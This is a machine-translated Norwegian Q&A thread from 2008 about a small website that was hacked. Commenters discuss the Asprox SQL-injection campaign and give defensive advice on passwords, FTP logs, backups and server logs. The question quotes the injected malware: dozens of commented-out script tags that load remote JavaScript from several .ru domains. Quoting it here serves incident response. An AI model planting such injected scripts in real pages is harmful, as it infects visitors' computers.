Min hjemmeside fikk hacket .. Hva skal jeg gjøre?

stemmer
18

Pappa ringte meg i dag og sa at folk går til hans hjemmeside var å få 168 virus prøver å laste ned til sine datamaskiner. Han er ikke teknisk i det hele tatt, og bygget det hele med en WYSIWYG editor.

Jeg popped hans nettsted åpen og sett kilden, og det var en linje på Javascript inkluderer nederst kilden rett før den avsluttende HTML-koden. De inkluderte denne filen (blant mange andre): http://www.98hs.ru/js.js <- slå av Javascript før du går til denne nettadressen.

Så jeg kommenterte det ut for nå. Det viser seg sin FTP passord var en vanlig ordbok ord seks bokstaver, så vi tror det er slik det ble hacket. Vi har endret sitt passord til en 8 + sifret ikke-ordet streng (han ville ikke gå for et passord siden han er en jakt-n-Peck Typer).

Jeg gjorde et whois på 98hs.ru og fant det driftes fra en server i Chile. Det er faktisk en e-post adresse assosiert med det også, men jeg alvorlig tvil om denne personen er den skyldige. Sannsynligvis bare et annet nettsted som ble hacket ...

Jeg aner ikke hva jeg skal gjøre på dette punktet, men som jeg aldri har jobbet med denne typen ting før. Alle som har noen forslag?

Han brukte vanlig jane un-sikret ftp gjennom webhost4life.com. Jeg vet ikke engang se en måte å gjøre sftp på deres nettsted. Jeg tenker sitt brukernavn og passord ble snappet opp?

Så, for å gjøre dette mer relevant for samfunnet, hva er fremgangsmåten du bør ta / beste praksis du bør følge for å beskytte din nettside fra å bli hacket?

For posten, her er linjen med kode som magisk ble lagt til hans fil (og er ikke i hans filen på sin datamaskin - Jeg har forlatt det kommentert ut bare for å være absolutt sikker på at det ikke vil gjøre noe på denne siden, selv om jeg er sikker på at Jeff ville gardere seg mot dette):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
Publisert på 05/08/2008 klokken 23:55
kilden bruker
På andre språk...                            


8 svar

stemmer
14

Jeg vet dette er litt sent i spillet, men nettadressen nevnt for Javascript er nevnt i en liste over nettsteder som er kjent for å ha vært en del av ASPRox bot oppblomstring som startet opp i juni (minst det er når vi får flagget med den). Noen detaljer om det er nevnt nedenfor:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

Den ekle ting om dette er at effektivt hver varchar type felt i databasen er "infisert" å spytte ut en referanse til denne nettadressen, der leseren får en liten iframe som gjør den til en bot. En grunnleggende SQL fix for dette finner du her:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

Det skremmende er likevel at viruset ser ut til systemtabeller for verdier å infisere og mye delt hosting planer også dele databasen plass for sine klienter. Så mest sannsynlig var det ikke engang din fars side som ble smittet, men noen andres nettsted innenfor hans hosting klynge som skrev noen dårlig kode og åpnet døren til SQL Injection angrep.

Hvis han ikke har gjort det ennå, vil jeg sende en HASTER e-post til sin vert og gi dem en link til at SQL-kode for å fikse hele systemet. Du kan fikse dine egne berørte databasetabeller, men mest sannsynlig roboter som gjør infeksjonen kommer til å passere rett gjennom det hullet igjen og infisere hele mye.

Forhåpentligvis gir dette deg litt mer info å jobbe med.

EDIT: En rask tanke, hvis han bruker en av vertene online design verktøy for å bygge sitt nettsted, alt dette innholdet er sannsynligvis sitter i en kolonne og ble smittet på den måten.

Svarte 07/08/2008 kl. 22:49
kilden bruker

stemmer
13

Prøv og samle så mye informasjon som mulig. Se om verten kan gi deg en logg som viser alle FTP tilkoblinger som ble gjort i kontoen din. Du kan bruke disse for å se om det var enda en FTP-tilkobling som ble brukt til å gjøre endringen, og muligens få en IP-adresse.

Hvis du bruker en ferdigpakket programvare som Wordpress, Drupal, eller noe annet som du ikke kode om det kan være svakheter i upload kode som gjør det mulig for denne typen modifisering. Hvis det er tilpasset bygget, dobbeltsjekke noen steder hvor du tillater brukere å laste opp filer eller endre eksisterende filer.

Den andre tingen ville være å ta en dump av nettstedet som den er og sjekke alt for andre modifikasjoner. Det kan bare være en enkel modifisering de gjorde, men hvis de fikk inn via FTP hvem vet hva annet er der oppe.

Tilbakestill nettstedet tilbake til en kjent god status og, om nødvendig, oppgradere til den nyeste versjonen.

Det er et nivå av avkastningen du må ta hensyn til også. Er skaden verdt å prøve å spore personen ned eller er dette noe der du bare leve og lære og bruke sterkere passord?

Svarte 06/08/2008 kl. 00:16
kilden bruker

stemmer
5

Du nevner faren din var å bruke et nettsted publiseringsverktøy.

Hvis publiseringsverktøyet publiserer fra sin datamaskin til serveren, kan det være slik at hans lokale filer er rene, og at han bare trenger å publisere til serveren.

Han bør se om det er en annen påloggingsmetode til sin server enn vanlig FTP, men ... det er ikke veldig sikker fordi det sender sin passord som klar tekst over internett.

Svarte 06/08/2008 kl. 03:31
kilden bruker

stemmer
3

Med en seks ord tegns passord, kan han ha blitt brute tvunget. Det er mer sannsynlig enn hans ftp blir snappet opp, men det kan være det også.

Start med en sterkere passord. (8 tegn er fortsatt ganske svak)

Se om denne linken til en Internett- sikkerhet blogg er nyttig.

Svarte 06/08/2008 kl. 00:00
kilden bruker

stemmer
2

Er området rett og slett statiske HTML? dvs at han ikke har klart å kode selv en opplastingsside som gjør at alle som kjører ved å laste opp svekket skript / sider?

Hvorfor ikke spørre Webhost4life om de har noen FTP-loggene tilgjengelig, og rapportere problemet til dem. Du vet aldri, de kan være ganske mottakelig og finne ut for deg nøyaktig hva som skjedde?

Jeg jobber for en felles hoster og vi ønsker velkommen alltid rapporter som disse og kan vanligvis finne den nøyaktige vektor for angrep basert og gi råd om hvor kunden gikk galt.

Svarte 06/08/2008 kl. 00:24
kilden bruker

stemmer
0

Dette skjedde med en klient av meg nylig som ble arrangert på iPower. Jeg er ikke sikker på om din hosting miljø ble Apache basert, men hvis det var å være sikker på å dobbeltsjekke for .htaccess filer som du ikke har laget, spesielt over Webroot og innsiden av bilde kataloger, som de pleier å injisere noen nastiness det samt (de ble omdirigere folk avhengig av hvor de kom fra i referere). Sjekk også noen som du har opprettet for kode som du ikke skrive.

Svarte 26/09/2008 kl. 20:21
kilden bruker

stemmer
0

Koble fra webserveren uten å slå det ned for å unngå nedleggelse skript. Analyser harddisken via en annen datamaskin som en datadisken og se om du kan finne den skyldige gjennom loggfiler og ting som naturen. Kontroller at koden er trygt og deretter gjenopprette den fra en sikkerhetskopi.

Svarte 26/09/2008 kl. 20:12
kilden bruker

stemmer
-1

Vi hadde blitt hacket fra samme folka tilsynelatende! Eller bots, i vårt tilfelle. De brukte SQL-injeksjon i URL på noen gamle klassiske ASP nettsider at ingen opprettholde lenger. Vi fant angripe IP-adresser og blokkert dem i IIS. Nå må vi refactor alle gamle ASP. Så mitt råd er å ta en titt på IIS logger først, for å finne ut om problemet er i nettstedets kode eller server konfigurasjon.

Svarte 16/08/2008 kl. 16:35
kilden bruker

Cookies help us deliver our services. By using our services, you agree to our use of cookies. Learn more